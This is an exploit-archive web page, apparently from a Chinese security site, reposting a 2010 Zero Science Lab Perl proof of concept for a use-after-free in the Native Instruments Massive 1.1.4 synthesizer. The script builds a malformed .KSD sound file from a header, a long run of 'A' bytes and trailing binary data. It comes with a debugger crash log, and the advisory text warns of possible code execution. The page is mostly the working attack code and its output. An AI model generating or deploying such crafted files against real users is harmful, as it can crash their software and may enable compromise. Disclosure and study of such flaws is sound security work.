首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2010-11-22  

#!/usr/bin/perl
#
#
# Title: Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.1.4 (R1901)
#
# Summary: MASSIVE is a sonic monster – the ultimate synth for basses and leads. The
# analog concept belies the contemporary, cutting-edge sound it generates. The high-end
# engine delivers pure quality, lending an undeniable virtue and character to even the
# most saturated of sounds. The interface is clearly laid out and easy to use, ensuring
# you will have MASSIVE generating earth-shuddering sounds from the very first note.
#
# Desc: Massive suffers from a use-after-free error when parsing sound files (.KSD)
# resulting in a crash. The user input is not properly sanitized which may give the
# attackers the possibility for an arbitrary code execution on the affected system.
# Failure of exploitation may result in a denial of service scenario.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#-------------------------------------------------------------------------------------#
#
# Heap corruption detected at 06B7F6E8
# HEAP[Massive.exe]: HEAP: Free Heap block 6b7f6e0 modified at 6b7f6f0 after it was freed
# (960.dc8): Break instruction exception - code 80000003 (first chance)
# eax=06b7f6e0 ebx=00000000 ecx=7c91e544 edx=098fee78 esi=06b7f6e0 edi=0007a7b0
# eip=7c90120e esp=098ff078 ebp=098ff07c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:010> g
# (960.dc8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=feeefeee ebx=0000f4e1 ecx=000063a8 edx=098fee78 esi=06b7f6e0 edi=06be1000
# eip=7c902c53 esp=098ff074 ebp=098ff2a4 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# ntdll!RtlFillMemoryUlong+0x10:
# 7c902c53 f3ab            rep stos dword ptr es:[edi]
# 0:010> g
# (960.dc8): C++ EH exception - code e06d7363 (first chance)
# Heap corruption detected at 06B80FA8
# Heap corruption detected at 06B80F18
# HEAP[Massive.exe]: HEAP: Free Heap block 6b80f10 modified at 6b80f20 after it was freed
# (960.ee8): Break instruction exception - code 80000003 (first chance)
# eax=06b80f10 ebx=04180000 ecx=7c91e544 edx=0012e8a4 esi=06b80f10 edi=06b80fa0
# eip=7c90120e esp=0012eaa4 ebp=0012eaa8 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
#
#-------------------------------------------------------------------------------------#
#
#
# Vulnerabilty discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail
# Zero Science Lab
# http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2010-4980
# Advisory ID: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4980.php
#
# 04.11.2010
#

use strict;

my $file = "massive_sound.ksd";

my $head = "\x2D\x69\x6E\x2D\x02\x00\x00\x00\x23\x4E\x49\x23\x43\x53\x23\x44\x6F\x63\x75\x6D\x65".
           "\x6E\x74\x23\x23\x4E\x49\x23\x53\x6F\x75\x6E\x64\x53\x68\x65\x6C\x6C\x23\x53\x6F\x75".
           "\x6E\x64\x23\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x31\x01\x00\x00\x61\x74\x61".
           "\x64\x02\x00\x00\x00\x64\x6E\x73\x73\x62\x69\x6C\x7A\x16\x00\x00\x00\x10\x00\x00\x00".
           "\x78\xDA\x63\x62\x60\x60\xD0\xF5\xF4\xD3\x4D\xF4\xCD\xF4\x03\x32\x19\x00\x13\x2F\x02".
           "\x59\x61\x74\x61\x64\x02\x00\x00\x00\x6F\x66\x6E\x69\x62\x69\x6C\x7A\xC0\x02\x00\x00".
           "\xCB\x05\x00\x00\x78\xDA\x75\x54\xC9\x6E\xDB\x30\x10\x75\x0F\xBD\xF8\x2B\x08\xDE\x6B".
           "\xB9\x29\x0A\xF4\x20\x29\x90\xB7\xC4\xA8\xED\x04\x91\xD3\xF6\x16\x30\xD2\x44\x22\x4A".
           "\x91\x06\x49\x39\xD5\xD7\xF5\xD7\x3A\x94\x4C\x59\x0E\x9A\x13\x67\x9F\x37\x0B\x87\x6C".
           "\xB6\xBF\x3E\x8C\x46\xA3\xBF\x1F\x47\xA3\xF0\xFA\x4F\x25\xC8\x11\xB4\xE1\x4A\x46\xF4".
           "\xF3\x64\x4A\x09\xC8\x4C\xE5\x5C\x16\x11\x7D\xDC\xAF\x3E\x7D\xA3\xC4\x58\x26\x73\x26".
           "\x94\x84\x88\x4A\x45\xC9\x75\x3C\x0E\x77\xEB\xA7\xC5\xDD\xFC\xE9\x76\x99\x2C\x96\x0F".
           "\x24\x57\xD9\xD3\x41\x30\xFB\xA2\x74\x15\x51\x8C\xE1\x04\x7D\xD4\x2F\xD3\xAF\x9D\xE4".
           "\x55\x73\x0B\x07\xAD\x2C\x64\x16\x72\x67\x18\x8F\xC7\x84\x84\x4E\x27\x59\x05\xB1\x05".
           "\x63\xC3\xA0\x67\x7B\xA5\x6D\x0E\x10\x67\xAA\x9A\x48\x66\xF9\x11\x3E\x71\x69\xAC\xAE".
           "\x2B\x90\xD6\x4C\x52\x55\xCB\x3C\x2D\x41\x88\x89\x71\x64\xE7\xDF\x7A\xF4\xFE\x19\xB3".
           "\x50\x28\xDD\xC4\xC8\xB4\x6E\x9D\x51\x2F\x6E\x0D\xB9\x7C\x51\x31\x12\x48\x62\xAA\x4A".
           "\xC9\xC4\x5A\xDD\x09\x50\xB4\xE0\x06\x2B\x6C\x76\x0E\x57\x18\x0C\x39\x6F\x91\xD4\xB6".
           "\x54\x1A\x95\x27\xC2\xCB\x7F\x80\xCC\x91\xDD\xB5\xD0\xC9\xFA\x0C\x3D\x0C\x4E\x2A\x6F".
           "\x39\x63\xF2\x77\x5B\xF8\x96\x19\xE3\x8C\x57\x2C\xB3\x88\x8F\xCC\x95\xB4\x2D\xEA\xDE".
           "\xC2\xBB\xCC\x11\x29\x6A\x30\xAB\xA7\xBC\x66\x9D\x29\x89\xE2\xF6\xF1\xB2\x7B\xAD\x0E".
           "\xE4\x01\x81\xB8\xE9\x4E\x69\x30\x08\x23\x94\x26\x49\x44\x7F\x96\x38\x22\xAF\x08\x83".
           "\xB7\x8D\x08\xF7\x90\x95\x92\x67\x4C\x5C\x36\x07\x8E\x3C\x83\x3D\xF6\xDC\xC5\x38\x97".
           "\x38\xC8\xF0\x1D\x9A\x0D\x6B\x54\x6D\xCF\xA2\x3E\x96\x83\x05\xDA\x72\x30\x64\x7E\xFF".
           "\xF8\x68\x58\x01\xED\x16\x6D\x14\xCB\xF7\xBC\xEA\x98\x2D\x54\x67\xCD\xAE\xAE\xD6\xF2".
           "\x50\x5B\xE3\xB9\xBB\xDA\x76\xEC\xD5\x20\xE7\xBD\xA8\x0B\x5C\x15\xCF\xF7\x12\xDF\xDF".
           "\x30\x38\xF1\xDE\x21\xB8\xF0\x08\x83\xFF\x54\x1B\x6E\x6B\xE3\x25\x64\x0F\xD5\x41\xE1".
           "\xB7\xB9\x9A\xBA\x55\xF6\x8D\xEF\xCB\x77\xCD\xD8\x32\x21\xC0\x0E\xC7\x3E\x00\xE8\x3B".
           "\x96\xE4\x39\x77\xDB\x41\xC9\x2C\xA2\x0B\x5E\x70\xCB\x04\x25\xF3\x88\x62\x67\x32\x30".
           "\x06\x72\x4A\x16\x11\x4D\x1B\x69\x4B\xB0\x3C\x1B\x86\xE0\xD5\xB3\x6E\x83\xCC\x34\x2F".
           "\x4A\xDB\x86\xC0\x71\xE6\xAD\x3F\xEE\xA9\x51\x92\xE1\x24\x9C\xFF\x2D\x1A\x50\xB2\x44".
           "\x50\x80\x09\x04\xC6\x21\xAB\x88\xEE\x14\x37\x0D\x25\x37\x18\x5F\xBD\xA0\xE1\x6D\x44".
           "\xF7\x25\x97\x83\x1C\x09\xCE\x26\xAB\xF1\x7F\xE3\x77\x76\x99\x16\x90\xB1\x06\x77\xA8".
           "\xCD\xB5\xCC\x4A\xD5\xD2\x98\x6E\x03\xAC\x43\xBA\x51\xB2\x20\x0F\x20\x80\x19\x68\x33".
           "\xA6\xAF\x00\x87\x60\xC5\x85\x05\x4D\xB6\x2A\x1F\x44\xBF\x01\xD9\x15\x90\x54\xCF\x1C".
           "\x1B\x14\x2C\x05\xDE\x07\xAD\x5C\xE3\xDB\x0C\xC9\x11\x0B\x28\x98\xCE\xE1\xB2\x6E\x48".
           "\x79\x81\x07\xA1\xD6\x70\xB1\x66\x83\xAD\xC6\x6F\x98\x9F\xD9\x14\xC7\x36\x30\xDD\xD7".
           "\x12\x71\xF7\xAB\x3E\x98\xAB\x13\x85\x41\x77\x0F\xDE\x5C\x06\x86\x6A\xFE\x5C\xDB\xF3".
           "\x0F\x3C\x32\x51\x43\x3C\xC3\xFB\x13\x06\x1D\x7D\x0A\xF8\xC6\xF4\x5D\xD7\xB4\xBB\x5A".
           "\xEF\xFB\xF6\x50\xC2\xE0\xE2\xEC\xC6\xE3\x7F\x0E\xC6\xBC\x49\x61\x74\x61\x64\x02\x00".
           "\x00\x00\x74\x73\x72\x70\x62\x69\x6C\x7A\xC5\x03\x00\x00\xF2\x16\x00\x00\x78\xDA\xED".
           "\x58\x49\x4F\x14\x41\x14\xAE\x9E\x61\x11\x0C\x08\x2A\xA2\x88\x38\x2A\x2A\xE0\x0A\x26".
           "\x84\x20\x54\xF7\xA0\x02\x46\x41\x20\xC1\x10\xF7\x61\x18\x1C\x64\x10\x84\x11\x11\xB7".
           "\x71\x19\x4C\x5C\x12\x8F\xE2\x2F\x30\xE8\x0F\xF0\x46\x87\x93\x07\x0F\x1E\x8D\x7A\xF1".
           "\xE2\x41\x2E\x9A\xA8\xF1\x24\xF6\x52\x3D\x5D\x55\xD3\xFD\xA8\x0E\x31\xF1\x60\x85\xA2".
           "\xDE\xD4\xF7\xBD\x57\xDF\xBC\x7A\x35\xBD\x14\x23\xBD\x25\x64\xC4\x34\xEA\xB3\xDA\xA2".
           "\xD9\x6F\xB1\x39\x97\x9A\x97\x49\x47\x8B\xCF\x29\xD8\xB6\xC3\xD8\xE6\xF1\x6B\x52\x6B".
           "\x27\x92\x86\x4F\xFB\xA3\x42\x17\x0E\xB3\x9E\xC9\x51\xA3\x32\x1B\xFB\x9B\x16\x23\x9B".
           "\xF8\xFB\xB5\x71\x52\xFE\xD5\x5F\xAF\x8D\x51\xDC\xFE\x3E\x64\x74\xA4\xB4\x01\x3A\x44".
           "\x9A\xBB\xEF\x50\xED\xFA\x25\xC4\x75\x88\xAD\x36\xC8\xF6\x1E\x00\xB9\x03\xF1\xF2\xF4".
           "\xF9\xC4\x4F\x73\x7F\x12\x0F\x31\xB5\x2E\xDF\x91\xA4\xF5\x0C\x49\x42\xC5\xC4\xF6\xE9".
           "\x4C\xD2\x33\x89\x23\x36\xBB\xE5\xA4\x90\x9E\x90\x25\xE2\xD4\x40\x46\xAF\xB6\xA7\xC5".
           "\x5C\xC8\xA9\x92\x41\x26\xD1\x6C\x7F\x2F";

my $ound = "\x41" x (6 * 10000 + (120000 / 30) + (2 * 100) + 50 + (2-1));

my $feet = "\x32\xFD\x1D\xDC\x3E\xFB\xA8\x7D\x90\xCC\x5D\xD6\x63\x48\x52\x6A\x66\x99\xD6\x8F\x8D".
           "\x85\xAB\x03\xC7\x87\x63\xB9\x96\xDD\x31\x10\x0F\x47\x75\xA4\x79\x20\x16\x8F\x8C\x06".
           "\xAA\x29\xBB\x26\x4B\xB7\x7B\x02\x6D\x03\x13\xC6\x6C\x24\xD2\xD7\x1B\x0A\x0F\xEA\xB3".
           "\xC1\x78\x5C\xB3\xB2\x35\xAB\x2B\x12\x8B\x84\xC6\x22\x7E\xB2\x74\x77\x77\x65\xD0\x94".
           "\xA2\xE0\xFC\x94\xA0\x05\xAD\x99\x02\x90\x9F\x2A\x30\xD3\x4E\xCC\xA6\x66\x66\x4D\xA2".
           "\xED\x92\xE3\xE6\xC2\x13\x6D\x2B\x97\x77\xF1\x91\x31\x8F\x93\xB3\x1C\x91\xDC\x97\x52".
           "\x0E\xB6\xFE\xF4\xC8\x79\xCE\x62\xD2\x89\xB6\x95\xEF\xDD\x65\x85\xB3\xFE\x74\x62\x01".
           "\xB2\x6B\x47\x48\xFF\x4A\xEF\x62\x56\x79\x77\x59\x2D\xAA\xBF\x88\xD6\x2F\x31\xDF\x43".
           "\xD1\x6A\x37\x10\x24\x7B\x2D\x1B\x44\x34\xD2\xF8\x00\xAF\x31\xAC\xBE\xFE\xCF\xD8\xC8".
           "\x92\xB4\x89\xFF\xEA\x8B\xCB\xDB\x2C\x2A\x6F\x0B\x22\x67\xC6\x5D\x52\xD7\xAB\x32\x99".
           "\x77\x2B\xA7\xE3\x3F\x9B\xCE\xE1\x5C\xCA\x92\x83\x72\x01\x57\x88\x5B\x45\x25\x6D\xD3".
           "\xCD\x0C\x6E\xC7\x21\x87\x0A\x51\x62\xA5\x91\x4E\x2F\xA1\xAB\x44\x89\x3B\x8C\xD0\x0B".
           "\x40\xE3\x6B\xF7\xF1\xDC\x11\x5C\xC4\xE5\xA8\x94\x2E\x12\xCB\x51\x54\xC2\x06\x96\xA8".
           "\xBA\x12\xCB\x44\x23\x6E\x14\x25\x06\x9C\x88\xAF\xDF\x1C\xC5\x66\xAE\xBF\x57\x7C\xC4".
           "\xC6\xB1\x44\x25\xD6\x25\x84\x27\xAB\x3F\x9E\x93\xBA\xB7\xA3\xAE\xB5\xA3\xAA\x5A\x5D".
           "\xAA\x8A\x8F\x29\x32\x9B\x58\x8C\xF8\xCB\x02\xF5\x9B\xAB\xB8\x89\xBE\x27\x4A\x4C\x5A".
           "\xC4\xF9\xCE\x29\x45\xED\x79\xE9\x4A\x9C\x12\x8D\x78\x5F\x34\xB1\xDB\xA9\x88\xFA\x15".
           "\x75\xD6\x8D\x58\xEB\x76\x3D\xF0\x93\x9C\x24\xCC\x33\x2C\xFD\xD6\xFF\xA7\x6B\x1C\xC7".
           "\x99\x5C\x52\xEB\x3C\x45\x44\xDC\xA1\x7A\x31\x33\xD3\x68\x8D\x12\x13\xF7\x36\x1F\xD7".
           "\x1A\x59\xDA\x1D\x3E\x97\x2C\x7C\x97\x2D\x24\x65\x0E\xA1\x27\x4D\x2C\xE5\x16\xAB\xA7".
           "\x0A\xB3\x70\x22\xED\x47\x80\xC5\x6F\xBA\xDE\x67\xFA\x3C\xCC\x4B\xD4\x81\xFE\xDF\xB8".
           "\x5C\x49\x1E\xFF\x88\x9F\xEF\x1F\xD2\xE3\x07\x6B\xE8\x04\x5C\x62\x67\x60\xB8\x17\x86".
           "\xFB\x61\xF8\x82\x05\xC7\xE4\xCC\xA6\x8E\x92\x0F\x73\x2C\x7C\x11\xF6\x1E\x85\xE1\x71".
           "\x18\x9E\x84\x8F\x00\x9C\xB4\x93\x70\xEC\xB3\x30\x1C\x86\xE1\xF3\x30\x3C\x08\x27\x6D".
           "\x18\xF6\x1E\x83\xE1\x2B\x30\x7C\x6D\x29\x49\x3B\x05\xC7\x3E\x07\xC3\x7D\x30\x1C\x85".
           "\xE1\x18\x9C\xB4\x11\xD8\x3B\x0E\xC3\x13\x30\x7C\x7D\x29\x49\x3B\xED\x14\xBB\xF5\x53".
           "\xBD\x6C\x3C\x10\xA0\x10\xBC\x74\x04\x86\x07\x60\x78\x08\x4E\xDA\x25\xD8\xFB\x32\x0C".
           "\x5F\x75\x82\xBF\x74\xD6\xC9\xC6\x63\x0B\xBA\xE1\x9C\x34\xEB\x0D\x4C\x06\x18\x1B\xF3".
           "\xB7\x24\x2C\xDC\x04\x2B\x6B\xB6\x00\xEA\x01\xF0\x9D\x76\xF1\x2E\x38\xC0\xF2\xEA\x4D".
           "\x6D\x92\xF5\xD0\x0F\x6B\x92\x61\x4D\x07\x60\x4D\x2D\x82\x9A\xF6\x93\x7C\x89\x69\x52".
           "\x60\x4D\x07\x61\x4D\xAD\x82\x9A\x1A\x3C\x69\x0A\xC2\x9A\x0E\xC1\x9A\x0E\x0B\x6A\x6A".
           "\xE4\x34\xF9\xA8\xB7\x8F\x5E\x6D\x7D\x95\x2C\x87\x1B\xD1\xD2\xE4\x3C\x2E\xE4\xEE\x58".
           "\x77\x8A\xDE\x55\xEF\x12\x25\xEE\x16\x25\xEE\x61\xDE\x50\x49\xDC\x43\x0E\x1F\xE1\xE9".
           "\xF4\x3A\x99\x17\xBF\x57\x74\xA9\x6A\x51\x62\x8D\x28\x71\x9F\xA3\x78\x93\xFD\x55\x3B".
           "\xCF\x7F\x00\x0F\x27\x6F\x13\x61\x74\x61\x64\x02\x00\x00\x00\x67\x70\x74\x63\x62\x69".
           "\x6C\x7A\x0C\x00\x00\x00\x04\x00\x00\x00\x78\xDA\x8B\x0C\xF1\x75\x05\x00\x03\x43\x01".
           "\x40\x61\x74\x61\x64\x02\x00\x00\x00\x44\x4E\x53\x53\x62\x69\x6C\x7A\x16\x00\x00\x00".
           "\x10\x00\x00\x00\x78\xDA\x63\x62\x60\x60\xD0\xF5\xF4\xD3\x4D\xF4\xCD\xF4\x03\x32\x19".
           "\x00\x13\x2F\x02\x59";

print "\n\n[*] Creating $file file...\n";
open KSD, ">./$file" || die "\nCan't open $file: $!";
print KSD $head.$ound.$feet;
print "\n[.] File successfully buffered!\n\n";
close KSD;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Native Instruments Service Cen
·Free CD to MP3 Converter 3.1 B
·Native Instruments Traktor Pro
·Minishare 1.5.5 Buffer Overflo
·Native Instruments Kontakt 4 P
·Windows Task Scheduler Privile
·FreeNAS exec_raw.php Arbitrary
·Xion Audio Player 1.0.126 Buff
·Xion Audio Player 1.0.126 (.m3
·DATAC RealWin SCADA Server Buf
·Xion Audio Player 1.0.127 (m3u
·Mosets Tree 2.1.6 (Joomla) Tem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved